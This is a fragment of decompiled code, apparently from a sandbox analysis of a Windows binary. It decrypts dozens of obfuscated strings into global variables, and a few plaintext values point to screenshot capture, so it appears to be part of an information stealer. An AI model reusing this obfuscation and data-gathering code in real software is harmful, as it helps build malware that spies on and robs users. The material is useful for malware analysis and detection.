				 *0x4323e8 = E00422F70(_t406, _t408, _t409, _t815, "ObA/jAzUO2Ctq1e9nw==");
				 *0x4321a8 = E00422F70(_t406, _t408, _t409, _t815, "O6YXv0/OCCmC2Qa2tMlBmqOQzg==");
				 *0x4324f8 = E00422F70(_t406, _t408, _t409, _t815, "f6Bq9Vo=");
				 *0x432100 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRC2x9lfpy4VB/KOcyp/eeYwgNLtW7FZ9oinPwE8mGXO+oUQ9oIuPTmY//FYp6Fk/jtbG33g/9AmyJJTtkm82k33qs3jfLl0=");
				 *0x432158 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCqs7ESshbNHxrvEmqXDcIdidaZSx0gw7jXZvwo1DXKo+gsqvKSQXXNmuRgO13NejszI1GQ0pw==");
				 *0x4323e4 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRA2R1neaoKlrmPeByY/YYYF8e6Vb4RJx8iHI+wZlBXKE/gE7rYmDED87uUA47E523f/Sx2515X/QW+n9zylh/S+z6CeCcx5wd5JwYcnj8E1jIXAdaf+hK7Oz19EyNRysSNA0qIZ8vwm0ByNx118=");
				 *0x4320b8 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCu/6EaahIJt17aa3vyQcI18fblW7Fc+7B/R/EQxBC376BwosYmHSHZ8smcx4F1hgoDE0n8+iyGVBruojV8pon33pWPCLkpoAfATDIfh700raGEsaeyqP7Q=");
				 *0x432390 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCO34E+hhY1f0fvIzLHcYJAsUpl41R487Trj9UU3AWmy/hA3qoI=");
				 *0x4325f0 = E00422F70(_t406, _t408, _t409, _t815, "CZYvlWrzRCu/6Ebpy5pT2KKNmpbiWrgsdb5D91g47iw=");
				 *0x432534 = E00422F70(_t406, _t408, _t409, _t815, "DoE2lQ==");
				 *0x4321ec = E00422F70(_t406, _t408, _t409, _t815, "HJIvg2w=");
				 *0x432240 = E00422F70(_t406, _t408, _t409, _t815, "dP0/jFnVCyO36Ua2xYVc3Q==");
				 *0x4324d0 = E00422F70(_t406, _t408, _t409, _t815, "f6A/jAM=");
				 *0x432488 = E00422F70(_t406, _t408, _t409, _t815, "Bo8vv0rGCGWN8UKxjg==");
				 *0x4322d0 = E00422F70(_t406, _t408, _t409, _t815, "FrwEuUeHICSq5A==");
				 *0x4320e4 = E00422F70(_t406, _t408, _t409, _t815, "GbwMu0DCFw==");
				 *0x432154 = E00422F70(_t406, _t408, _t409, _t815, "DbYB8G3GECQ=");
				 *0x432474 = E00422F70(_t406, _t408, _t409, _t815, "ObwMu0DCF2ut9E+sn4k=");
				 *0x4322f4 = E00422F70(_t406, _t408, _t409, _t815, "NrwEuUfUSi+t6k0=");
				 *0x4320c8 = E00422F70(_t406, _t408, _t409, _t815, "PLwRvUHOFzGx91rrmJ1e3aON");
				 *0x432368 = E00422F70(_t406, _t408, _t409, _t815, "Bo8soEzVBWWN6kWxnI1A0Yu09aDVZ5QsR79W+lI03hw=");
				 *0x432370 = E00422F70(_t406, _t408, _t409, _t815, "FaMGokg=");
				 *0x4324f4 = E00422F70(_t406, _t408, _t409, _t815, "Bo8kv0bACCCC2WCtmYNf0Yu076PVZ9VIdb9W");
				 *0x4323f8 = E00422F70(_t406, _t408, _t409, _t815, "HbwMt0XCRAa290yojg==");
				 *0x4325e4 = E00422F70(_t406, _t408, _t409, _t815, "Bo8guFvICSyr6H+Zvp9Xxves26TR");
				 *0x432200 = E00422F70(_t406, _t408, _t409, _t815, "GbsRv0TOESg=");
				 *0x43253c = E00422F70(_t406, _t408, _t409, _t815, "Bo8ov0TCECSC2Xa2jp4S8Lac2w==");
				 *0x432288 = E00422F70(_t406, _t408, _t409, _t815, "EbwOtV3G");
				 *0x43246c = E00422F70(_t406, _t408, _t409, _t815, "Bo8ivUDACxmC0FCgmcx21aOJ");
				 *0x4324b8 = E00422F70(_t406, _t408, _t409, _t815, "G74Kt0Y=");
				 *0x432670 = E00422F70(_t406, _t408, _t409, _t815, "Bo83v1vEDBmC0FCgmcx21aOJ");
				 *0x4323fc = E00422F70(_t406, _t408, _t409, _t815, "DrwRs0E=");
				 *0x43230c = E00422F70(_t406, _t408, _t409, _t815, "Bo8sokvOEDCz2X+QmIlAlJOJzrE=");
				 *0x43254c = E00422F70(_t406, _t408, _t409, _t815, "FaEBuV3SCQ==");
				 *0x432684 = E00422F70(_t406, _t408, _t409, _t815, "Bo8gv0TIZCqC2We3iotd2ou076PVZ9VIdb9W");
				 *0x432640 = E00422F70(_t406, _t408, _t409, _t815, "GbwOv03IRAGs5ESqhQ==");
				 *0x432324 = E00422F70(_t406, _t408, _t409, _t815, "Bo8tuUrPFiqz4H+Zvp9Xxves26TR");
				 *0x432268 = E00422F70(_t406, _t408, _t409, _t815, "FLpjuFvICSA=");
				 *0x432350 = E00422F70(_t406, _t408, _t409, _t815, "Bo8usVHTDCqwsH+Zvp9XxqQ=");
				 *0x4323c4 = E00422F70(_t406, _t408, _t409, _t815, "F7IbpEHICnA=");
				 *0x4321bc = E00422F70(_t406, _t408, _t409, _t815, "Bo8woFzTCiy12X+QmIlAlJOJzrE=");
				 *0x4320b4 = E00422F70(_t406, _t408, _t409, _t815, "CaMWpEfODw==");
				 *0x4324dc = E00422F70(_t406, _t408, _t409, _t815, "Bo8moEDERBWs7FWkiJUS9qWHzaPVZ6lQQbhS6h4V4zTd");
				 *0x432598 = E00422F70(_t406, _t408, _t409, _t815, "H4Mh");
				 *0x432320 = E00422F70(_t406, _t408, _t409, _t815, "Bo81uV/GCCG32X+QmIlAlJOJzrE=");
				 *0x432410 = E00422F70(_t406, _t408, _t409, _t815, "DLoVsUXDDQ==");
				 *0x43231c = E00422F70(_t406, _t408, _t409, _t815, "Bo8gv0rkCyaC2WG3hJtB0aW05oXDcIcsUKpD+Q==");
				 *0x4320fc = E00422F70(_t406, _t408, _t409, _t815, "Gbxjk0bERAes6lS2jp4=");
				 *0x43223c = E00422F70(_t406, _t408, _t409, _t815, "Bo8Wk0bdKSC67EKZt7lA1bm05oXDcIcsUKpD+Q==");
				 *0x43240c = E00422F70(_t406, _t408, _t409, _t815, "D6ECvgnlFiqp9ka3");
				 *0x43235c = E00422F70(_t406, _t408, _t409, _t815, "Bo8ymXmHNzCs43+Zvp9Xxves26TR");
				 *0x4324d8 = E00422F70(_t406, _t408, _t409, _t815, "C5oz8HrSFiM=");
				 *0x4325b8 = E00422F70(_t406, _t408, _t409, _t815, "Bo8gtUfTJjex8lCgmbBu4aSNyPD0dIFt");
				 *0x432638 = E00422F70(_t406, _t408, _t409, _t815, "GbYNpA==");
				 *0x432358 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzKASuq9gOHmYNFx7Ka5ozlZpB+NI9W7F8=");
				 *0x432148 = E00422F70(_t406, _t408, _t409, _t815, "H78GvUzJEDb+x1GqnJ9Xxg==");
				 *0x43260c = E00422F70(_t406, _t408, _t409, _t815, "Bo83v1vlFiqC2XO3hIpb2LI=");
				 *0x432660 = E00422F70(_t406, _t408, _t409, _t815, "DrwRklvI");
				 *0x432128 = E00422F70(_t406, _t408, _t409, _t815, "Bo8golDXECqK5EHlqZ5dw6SNyIzsQIZpZutz+Uow");
				 *0x432168 = E00422F70(_t406, _t408, _t409, _t815, "GaEaoF3IMCS8");
				 *0x4326e0 = E00422F70(_t406, _t408, _t409, _t815, "Bo8hokjRARax41eyip5X6IuqyLHGcNhOZqRA61sj3hzp4E83TEW6+QU=");
				 *0x4323d0 = E00422F70(_t406, _t408, _t409, _t815, "GKECpkw=");
				 *0x432260 = E00422F70(_t406, _t408, _t409, _t815, "Bo8uv1POCCm/2X+Dgp5X0riQ5ozgZ5pqfadS62IN");
				 *0x432334 = E00422F70(_t406, _t408, _t409, _t815, "F7wZuUXLBWWY7FGgjYNK");
				 *0x43251c = E00422F70(_t406, _t408, _t409, _t815, "Bo8uv0bJBy236Uflu55d0KKLzrnfe4ZQSJtW9Ftxzy/T/XYZPHO06w00vYi6YA==");
				 *0x4320b0 = E00422F70(_t406, _t408, _t409, _t815, "CrIPtQnqCyqw");
				 *0x432444 = E00422F70(_t406, _t408, _t409, _t815, "Bo80sV3CFiOx/X+Zu55d0r6E36PsSQ==");
				 *0x4323b4 = E00422F70(_t406, _t408, _t409, _t815, "DbIXtVvBCz0=");
				 *0x432284 = E00422F70(_t406, _t408, _t409, _t815, "Bo9boEzEHDaq8EeshJ9u6JSR2LXCc5p0SJdn6lE36yzZ4HYZ");
				 *0x4322a8 = E00422F70(_t406, _t408, _t409, _t815, "GaoBtVvBCz0=");
				_t179 = E00422F70(_t406, _t408, _t409, _t815, "Bo8tlX3gJRGbpXegiIRc27uH3bnVZqlQVqdW+1UZ4zfXz3YVHm695Ag9q6e6"); // executed
				 *0x4321c0 = _t179;
				 *0x432514 = E00422F70(_t406, _t408, _t409, _t815, "GL8Cs0LvBTK1");
				 *0x432434 = E00422F70(_t406, _t408, _t409, _t815, "Bo8uv1POCCm/2X+siIlR1aO05oDCepNleK5ExGI=");
				 *0x4320f0 = E00422F70(_t406, _t408, _t409, _t815, "E7AGk0jT");
				 *0x432228 = E00422F70(_t406, _t408, _t409, _t815, "Bo8o/WTCCCCx63+Z");
				 *0x432208 = E00422F70(_t406, _t408, _t409, _t815, "EZ4GvEzICg==");
				 *0x4323b0 = E00422F70(_t406, _t408, _t409, _t815, "Bo83uFzJZCCs50q3j7Bu5KWH3LnccIZQSA==");
				 *0x432248 = E00422F70(_t406, _t408, _t409, _t815, "DrsWvk3CFie390c=");
				 *0x4321e0 = E00422F70(_t406, _t408, _t409, _t815, "EpIxlH7mNkWC2WeAuK9g/Ye885/+SalfbbhD/VMN3gPZ/V43DW2L/ws7vYiVU21PgAg=");
				 *0x432574 = E00422F70(_t406, _t408, _t409, _t815, "CqEMs0zUFyqsy0Kojr9Gxr6G3Q==");
				 *0x43243c = E00422F70(_t406, _t408, _t409, _t815, "MbYRvkzLV3fw4U+p");
				 *0x4321d4 = E00422F70(_t406, _t408, _t409, _t815, "f7dDnWs=");
				 *0x4322d4 = E00422F70(_t406, _t408, _t409, _t815, "D70I");
				 *0x4323d8 = E00422F70(_t406, _t408, _t409, _t815, "CZwlhH7mNkWC2W6siJ5dx7iOzozsQpxicKRA6x4f1hzg0F83HmS1+TI9qoiPU3E=");
				 *0x432480 = E00422F70(_t406, _t408, _t409, _t815, "CqEMtFzEEAu/6EY=");
				 *0x432164 = E00422F70(_t406, _t408, _t409, _t815, "IuVX");
				 *0x432120 = E00422F70(_t406, _t408, _t409, _t815, "IutV");
				 *0x432594 = E00422F70(_t406, _t408, _t409, _t815, "CZwlhH7mNkWC2W6siJ5dx7iOzozsVod1ZL9Y/0ww8ijF");
				 *0x432224 = E00422F70(_t406, _t408, _t409, _t815, "F7JjuEDJAQKr7Ec=");
				 *0x432220 = E00422F70(_t406, _t408, _t409, _t815, "f7dM9U2IQSH+oEf/zogIkbM=");
				 *0x432450 = E00422F70(_t406, _t408, _t409, _t815, "f7c89U34QSGBoEeazohtkbM=");
				 *0x4324cc = E00422F70(_t406, _t408, _t409, _t815, "D4cg9U0=");
				 *0x4320ec = E00422F70(_t406, _t408, _t409, _t815, "HpowgGXmPQ==");
				 *0x4322a0 = E00422F70(_t406, _t408, _t409, _t815, "f7cb9U0=");
				 *0x43244c = E00422F70(_t406, _t408, _t409, _t815, "CZwlhH7mNkWC2W6siJ5dx7iOzozsQpxicKRA62INwTXO4U8rGFe+/xcxt5W6YEp9tVY78V1/wg==");
				 *0x432678 = E00422F70(_t406, _t408, _t409, _t815, "HroQoEXGHQu/6EY=");
				 *0x432418 = E00422F70(_t406, _t408, _t409, _t815, "HroQoEXGHRO791CshII=");
				_t206 = E00422F70(_t406, _t408, _t409, _t815, "f6BGtA=="); // executed
				 *0x4325ac = _t206;
				 *0x4320d0 = L"image/jpeg";
				 *0x4322ac = L"screenshot.jpg";
				 *0x4322cc = E00422F70(_t406, _t408, _t409, _t815, "dbBDpEjUDy636U/lxJxb0PfN3vCWNZB+dbhSuBsiomacwW5lQ1L7ojV4/Yi6YDUz+hgt/VVn");
				 *0x432634 = E00422F70(_t406, _t408, _t409, _t815, "Ob4H/kzfAQ==");
				 *0x4325e0 = E00422F70(_t406, _t408, _t409, _t815, "a5EmlhnmUXKcwBL026p2gOHf+w==");
				 *0x432134 = E00422F70(_t406, _t408, _t409, _t815, "GbwNpEzJEGia7FC1hJ9bwL6H1OqQc5p+eeZT+UowuWDS8kcgUV35");
				 *0x432174 = E00422F70(_t406, _t408, _t409, _t815, "Bg==");
				_t212 = E00422F70(_t406, _t408, _t409, _t815, "GbwNpEzJEGiK/FOg0cw="); // executed
				 *0x432118 = _t212;
				 *0x4323c0 = E00422F70(_t406, _t408, _t409, _t815, "G7BjtVnTXmWq4FuxxIRG2bvEmrHAZZlld6pD8VE/rTjR/xE0UTH1tEh4uYuWUHZwvUwh6lI81sjT3mFxrCKMR/mkkmErqTH1snSaa0clJsU5bs3y+E9jIXwea+q9dKC/1aJkPR24SpV9osRp/QOvBSlongy5bLQjerS2RJc=");
				 *0x4320f8 = E00422F70(_t406, _t408, _t409, _t815, "G7BjtVnTSQm/60SwiotXjveaz/3iQNl+YfBGpQ5/u2zZ/RE0UTH1tQ==");
				 *0x432448 = E00422F70(_t406, _t408, _t409, _t815, "G7BjtVnTSQa25FG2jpgIlL6b1f2ILcA1OfobuEsl5G2EvwowGGf2vFJ0+NHdTSIj8gk=");
				 *0x4324a8 = E00422F70(_t406, _t408, _t409, _t815, "G7BjtVnTSUWw5kyhgoJVjveM37bcdIFpOOtQ4lchrmDEvk0/BXH3rQ08vZWSVWtq8Bhivk0ung==");
				 *0x432250 = E00422F70(_t406, _t408, _t409, _t815, "GbwNpEzJEGiK/FOg0cxfwbuc06DRZ4EjcqRF9RM14zTdqAonA3S16QUqocY=");
				 *0x4325fc = E00422F70(_t406, _t408, _t409, _t815, "GbwNpEzJEGiS4E2in4QIlA==");
				 *0x4320c4 = E00422F70(_t406, _t408, _t409, _t815, "Bo9jolDXECo=");
				 *0x432190 = E00422F70(_t406, _t408, _t409, _t815, "cKQCvAOJZCSq");
				 *0x4322e4 = E00422F70(_t406, _t408, _t409, _t815, "MbYao13IFiA=");
				 *0x4325e8 = E00422F70(_t406, _t408, _t409, _t815, "PrYFsVzLEBqp5E+pjpg=");
				 *0x43263c = E00422F70(_t406, _t408, _t409, _t815, "P6sMtFzUSiax60XrgZ9d2g==");
				 *0x432384 = E00422F70(_t406, _t408, _t409, _t815, "LboNtEbQSTaq5FegxYZB27k=");
				 *0x432464 = E00422F70(_t406, _t408, _t409, _t815, "KrIQo1nPFiSt4A2vmINc");
				 *0x4325f8 = E00422F70(_t406, _t408, _t409, _t815, "KbYGtAfUASax");
				 *0x432614 = E00422F70(_t406, _t408, _t409, _t815, "M70FvwfUASax");
				 *0x4324e8 = E00422F70(_t406, _t408, _t409, _t815, "N6YPpEDDCyK7q1Skh4BXwA==");
				 *0x4321dc = E00422F70(_t406, _t408, _t409, _t815, "cA==");
				 *0x43211c = E00422F70(_t406, _t408, _t409, _t815, "Bo8huV3ECyyw2X8=");
				 *0x432680 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mpEHCFiCr6H+Z");
				 *0x432620 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDer6A==");
				 *0x432610 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDer6H+ZnI1e2LKcyYzs");
				 *0x432344 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDer6A6Jv68=");
				 *0x432290 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDer6A6Jv69u6KCJ1rzVYYZQSA==");
				 *0x432194 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDex62CkmIQ=");
				 *0x432328 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mvEzEEDex62CkmIRu6KCJ1rzVYYZQSA==");
				 *0x432144 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mqEbDETaC2Q==");
				 *0x432478 = E00422F70(_t406, _t408, _t409, _t815, "Bo8mqEbDETaC2Ua9hIhHx/mf27zccIFQSA==");
				 *0x432430 = E00422F70(_t406, _t408, _t409, _t815, "Bo8upUXTDQGx4kaZtw==");
				 *0x4326a4 = E00422F70(_t406, _t408, _t409, _t815, "Bo85s0jUDBmC");
				 *0x432630 = E00422F70(_t406, _t408, _t409, _t815, "Bo8nsVrPJyqs4H+Z");
				 *0x4323e0 = E00422F70(_t406, _t408, _t409, _t815, "Bo8vuV3CByq363+Z");
				 *0x43269c = E00422F70(_t406, _t408, _t409, _t815, "Bo8ivkbJByq363+Z");
				 *0x432510 = E00422F70(_t406, _t408, _t409, _t815, "Bo8hknjkCyyw2X8=");
				 *0x432484 = E00422F70(_t406, _t408, _t409, _t815, "Bo8HtV/ECyyw2X8=");
				 *0x432698 = E00422F70(_t406, _t408, _t409, _t815, "Bo8HuU7OECSy5kyshbBu");
				 *0x432518 = E00422F70(_t406, _t408, _t409, _t815, "Bo8lvEbVDSu96kqrt7A=");
				 *0x43234c = E00422F70(_t406, _t408, _t409, _t815, "Bo8lokjJDyqC2Q==");
				 *0x432238 = E00422F70(_t406, _t408, _t409, _t815, "Bo8lokzOByq363+Z");
				 *0x432414 = E00422F70(_t406, _t408, _t409, _t815, "Bo8kv0XDJyq362SJrw==");
				 *0x43216c = E00422F70(_t406, _t408, _t409, _t815, "Bo8kv0XDJyq36wPtrKB2nYu0");
				 *0x43268c = E00422F70(_t406, _t408, _t409, _t815, "Bo8qvk/OCiyq4ECqgoJu6A==");
				 *0x432654 = E00422F70(_t406, _t408, _t409, _t815, "Bo8qn2rIDSuC2Q==");
				 *0x4320c0 = E00422F70(_t406, _t408, _t409, _t815, "Bo8qqErIDSuC2Q==");
				 *0x4321ac = E00422F70(_t406, _t408, _t409, _t815, "Bo8utU7GByq363+Z");
				 *0x432530 = E00422F70(_t406, _t408, _t409, _t815, "Bo8uuUfECyyw2X8=");
				 *0x432380 = E00422F70(_t406, _t408, _t409, _t815, "Bo8tsUTCByq363+Z");
				 *0x43209c = E00422F70(_t406, _t408, _t409, _t815, "Bo8zokDKASax7E2Ztw==");
				 *0x4320cc = E00422F70(_t406, _t408, _t409, _t815, "Bo83tVvVBSax7E2Ztw==");
				 *0x432180 = E00422F70(_t406, _t408, _t409, _t815, "Bo86kWrIDSuC2Q==");
				 *0x432300 = E00422F70(_t406, _t408, _t409, _t815, "Bo8JsVHfOBk=");
				 *0x432130 = E00422F70(_t406, _t408, _t409, _t815, "Bo9jv0SJCCy84FGxksJY1a+Q5oz5e5FpbK5T3HwN3ibV/08aMzH15Ao8vYODWHtx8lQt81l/ysL77w==");
				 *0x432560 = E00422F70(_t406, _t408, _t409, _t815, "KbsPp0jXDWu66U8=");
				 *0x432318 = E00422F70(_t406, _t408, _t409, _t815, "OLARqVnTSiGy6Q==");
				 *0x4322dc = E00422F70(_t406, _t408, _t409, _t815, "LboNuUfCEGu66U8=");
				 *0x4321d8 = E00422F70(_t406, _t408, _t409, _t815, "OaEaoF2UVmu66U8=");
				 *0x432234 = E00422F70(_t406, _t408, _t409, _t815, "KqACoECJZCmy");
				 *0x43262c = E00422F70(_t406, _t408, _t409, _t815, "Nb8G4xuJZCmy");
				 *0x43221c = E00422F70(_t406, _t408, _t409, _t815, "KbsGvEWUVmu66U8=");
				 *0x4325dc = E00422F70(_t406, _t408, _t409, _t815, "O7cVsVnOV3fw4U+p");
				 *0x432364 = E00422F70(_t406, _t408, _t409, _t815, "PbcKoEXSF2u66U8=");
				 *0x432160 = E00422F70(_t406, _t408, _t409, _t815, "PbcK4xuJZCmy");
				 *0x432108 = E00422F70(_t406, _t408, _t409, _t815, "L6AGohqVSiGy6Q==");
				 *0x432204 = E00422F70(_t406, _t408, _t409, _t815, "FrwCtGXOBje/91qE");
				 *0x432438 = E00422F70(_t406, _t408, _t409, _t815, "HbYXgFvIBwS64VGgmJ8=");
				 *0x4326e8 = E00422F70(_t406, _t408, _t409, _t815, "H6sKpHnVCya79lA=");
				 *0x432540 = E00422F70(_t406, _t408, _t409, _t815, "HbYXhVrCFgG740Kwh5h+1bmP85Q=");
				 *0x4324b4 = E00422F70(_t406, _t408, _t409, _t815, "HLoNtG/OFjaqw0qpjq0=");
				 *0x4320e0 = E00422F70(_t406, _t408, _t409, _t815, "HrYPtV3CIiyy4GI=");
				 *0x432554 = E00422F70(_t406, _t408, _t409, _t815, "HLoNtGfCHDGY7E+gqg==");
				 *0x432274 = E00422F70(_t406, _t408, _t409, _t815, "HLoNtGrLCza7");
				 *0x4325cc = E00422F70(_t406, _t408, _t409, _t815, "HbYXg1DUECCzzE2jhA==");
				 *0x4320dc = E00422F70(_t406, _t408, _t409, _t815, "Hb8MskjLKSCz6lG8uJhTwKKb/6g=");
				 *0x4326c8 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk0bKFDCq4FGLioFX9Q==");
				 *0x43213c = E00422F70(_t406, _t408, _t409, _t815, "E6A0v16RUBWs6kCgmJ8=");
				 *0x432230 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk1zVFiCw8XO3hI9Xx6Q=");
				 *0x432218 = E00422F70(_t406, _t408, _t409, _t815, "HbYXnEbEBSmK7E6g");
				 *0x4326c0 = E00422F70(_t406, _t408, _t409, _t815, "HbYXhEDKAR+x60aMhYpdxrqJzrnfew==");
				 *0x4322fc = E00422F70(_t406, _t408, _t409, _t815, "HbYXg1DUECCz1Uyyjp5hwLacz6M=");
				 *0x432580 = E00422F70(_t406, _t408, _t409, _t815, "HbYXhVrCFgG740Kwh5h+27SJ1rX+dJhp");
				 *0x4323dc = E00422F70(_t406, _t408, _t409, _t815, "DboHtWrPBTeK6m6wh5hb9q6c3w==");
				 *0x43245c = E00422F70(_t406, _t408, _t409, _t815, "FaMGvnnVCya79lA=");
				 *0x432270 = E00422F70(_t406, _t408, _t409, _t815, "Gb8Mo0zvBSu66UY=");
				 *0x4321e8 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk1zVFiCw8XO3hI9Xx6Sh3g==");
				 *0x4323d4 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk1zVFiCw8WesmYlRwLiaw5E=");
				 *0x43238c = E00422F70(_t406, _t408, _t409, _t815, "CLYOv1/CICys4ECxhJ5L9Q==");
				 *0x4324e4 = E00422F70(_t406, _t408, _t409, _t815, "CbYXk1zVFiCw8WesmYlRwLiaw5E=");
				 *0x432500 = E00422F70(_t406, _t408, _t409, _t815, "GaEGsV3CICys4ECxhJ5L9Q==");
				 *0x432340 = E00422F70(_t406, _t408, _t409, _t815, "HKEGtWXOBje/91o=");
				 *0x432628 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlUfRDTex606ghZhk1aWB27LccLQ=");
				 *0x43257c = E00422F70(_t406, _t408, _t409, _t815, "HbYXgFvOEiSq4HO3hIpb2LK737PEfJpiWqpa/U0Q");
				 *0x43237c = E00422F70(_t406, _t408, _t409, _t815, "GbwTqW/OCCCf");
				 *0x43249c = E00422F70(_t406, _t408, _t409, _t815, "CbYXlkDLARWx7E2xjp4=");
				 *0x432314 = E00422F70(_t406, _t408, _t409, _t815, "ErYCoGjLCCq9");
				 *0x432648 = E00422F70(_t406, _t408, _t409, _t815, "HbYXgFvIByCt9mugipw=");
				 *0x4325d8 = E00422F70(_t406, _t408, _t409, _t815, "GaEGsV3CIiyy4GI=");
				 *0x43255c = E00422F70(_t406, _t408, _t409, _t815, "DaEKpEzhDSm7");
				 *0x4324e0 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlkDLARa3/0aAkw==");
				 *0x43267c = E00422F70(_t406, _t408, _t409, _t815, "NqAXokrGEAQ=");
				 *0x43217c = E00422F70(_t406, _t408, _t409, _t815, "FrxjsUXmCCmx5g==");
				 *0x4322b0 = E00422F70(_t406, _t408, _t409, _t815, "Hb8MskjLIje74A==");
				 *0x4325c4 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlkDLARa3/0Y=");
				 *0x4326d0 = E00422F70(_t406, _t408, _t409, _t815, "CLYCtG/OCCA=");
				_t315 = E00422F70(_t406, _t408, _t409, _t815, "HbYXhkzVFyyx62a9vA=="); // executed
				 *0x4321fc = _t315;
				 *0x4325a4 = E00422F70(_t406, _t408, _t409, _t815, "CbYXlUfRDTex606ghZhk1aWB27LccLQ=");
				 *0x4323f4 = E00422F70(_t406, _t408, _t409, _t815, "F7IThkDCEwq4w0qpjg==");
				 *0x4323ec = E00422F70(_t406, _t408, _t409, _t815, "D70OsVnxDSCpykWDgoBX");
				 *0x4322c8 = E00422F70(_t406, _t408, _t409, _t815, "CaoQpEzKMCyz4HeqrYVe0YOB17U=");
				 *0x43266c = E00422F70(_t406, _t408, _t409, _t815, "HbYXhEDEDwax8E2x");
				 *0x4320ac = E00422F70(_t406, _t408, _t409, _t815, "HLoPtX3OCSCK6nC8mJhX2YOB17U=");
				 *0x43218c = E00422F70(_t406, _t408, _t409, _t815, "GaEGsV3CIiyy4G6km5xb2rCp");
				 *0x4321b8 = E00422F70(_t406, _t408, _t409, _t815, "HbYXlkDLAQyw40y3ho1G3biG+Kn4dJtoeK4=");
				 *0x432330 = E00422F70(_t406, _t408, _t409, _t815, "HqYTvEDEBTG7zUKrj4BX");
				 *0x432124 = E00422F70(_t406, _t408, _t409, _t815, "FrxjsUXhFiC7");
				 *0x432428 = E00422F70(_t406, _t408, _t409, _t815, "HbYXnEbEBSm7zE2jhK0=");
				 *0x432150 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTJymx9kaEh4tdxr6c0r3gZ5p6fa9S6g==");
				 *0x432668 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTICCt8VGqkqdXzQ==");
				 *0x4324a4 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTKzW762KpjINA3aOA14DCeoNlcK5F");
				 *0x43233c = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTNyCq1VGqm4lAwK4=");
				 *0x4324b0 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTIyCw4FGkn4lhzbqF36TCfJZHcbI=");
				 *0x432110 = E00422F70(_t406, _t408, _t409, _t815, "GJARqVnTICC991q1nw==");
				 *0x432424 = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGN4FeKm5hb27mp");
				 *0x4324fc = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGM4EKhrYVe0Q==");
				 *0x4326b4 = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGN4FeDgoBX5LiB1KTVZw==");
				 *0x432454 = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGR9Uarqg==");
				 *0x43226c = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGd6k2rjo9G9Q==");
				 *0x4324c0 = E00422F70(_t406, _t408, _t409, _t815, "EqcXoGbXASuM4FKwjp9G9Q==");
				 *0x4323ac = E00422F70(_t406, _t408, _t409, _t815, "EqcXoHjSATenzE2jhK0=");
				 *0x43225c = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGd6Uy2jqRT2rOE3w==");
				 *0x4324f0 = E00422F70(_t406, _t408, _t409, _t815, "EqcXoHrCCiGM4FKwjp9G9Q==");
				 *0x43265c = E00422F70(_t406, _t408, _t409, _t815, "EqcXoGjDZBe79FagmJh60baM36LDVA==");
				 *0x432280 = E00422F70(_t406, _t408, _t409, _t815, "E70XtVvJATGR9Uarvp5e9Q==");
				 *0x43232c = E00422F70(_t406, _t408, _t409, _t815, "GaEaoF3yCjWs6legiJh21aOJ");
				 *0x432114 = E00422F70(_t406, _t408, _t409, _t815, "GaEaoF30EDe360SRhK5b2raaw5E=");
				 *0x432378 = E00422F70(_t406, _t408, _t409, _t815, "HbYXnUbDESm7w0qpjqJT2bKtwpE=");
				 *0x432470 = E00422F70(_t406, _t408, _t409, _t815, "GbwgokzGECCX61CxioJR0Q==");
				 *0x432308 = E00422F70(_t406, _t408, _t409, _t815, "Gbw2vkDJDTG35E+skYk=");
				 *0x43227c = E00422F70(_t406, _t408, _t409, _t815, "CZsktV3hCym64FGVipha9Q==");
				 *0x4326b0 = E00422F70(_t406, _t408, _t409, _t815, "CbsGvEXiHCC98Fegqg==");
				 *0x43210c = E00422F70(_t406, _t408, _t409, _t815, "CZsluUXCKzW790KxgoNc9Q==");
				 *0x43261c = E00422F70(_t406, _t408, _t409, _t815, "CLYEn1nCCg67/Ga9qg==");
				 *0x4324c8 = E00422F70(_t406, _t408, _t409, _t815, "CLYEgVzCFjyI5E+wjqlK9Q==");
				 *0x4321b4 = E00422F70(_t406, _t408, _t409, _t815, "CLYEk0XIFyCV4Fo=");
				 *0x432528 = E00422F70(_t406, _t408, _t409, _t815, "HbYXhVrCFgu/6EaE");
				 *0x432674 = E00422F70(_t406, _t408, _t409, _t815, "HbYXk1zVFiCw8Wuyu55d0r6E35E=");
				 *0x43222c = E00422F70(_t406, _t408, _t409, _t815, "CLYElUfSCQ67/Ga9qg==");
				 *0x43212c = E00422F70(_t406, _t408, _t409, _t815, "CrIXuGTGECa21lOgiK0=");
				 *0x4323a4 = E00422F70(_t406, _t408, _t409, _t815, "HbcKoG7CEAyz5ESgroJR27ONyKPjfI9p");
				 *0x4322a4 = E00422F70(_t406, _t408, _t409, _t815, "HbcKoG7CEAyz5ESgroJR27ONyKM=");
				 *0x4322f8 = E00422F70(_t406, _t408, _t409, _t815, "HbcKoGrVASSq4GGsn4FTxJGa1b34V7xYWYpn");
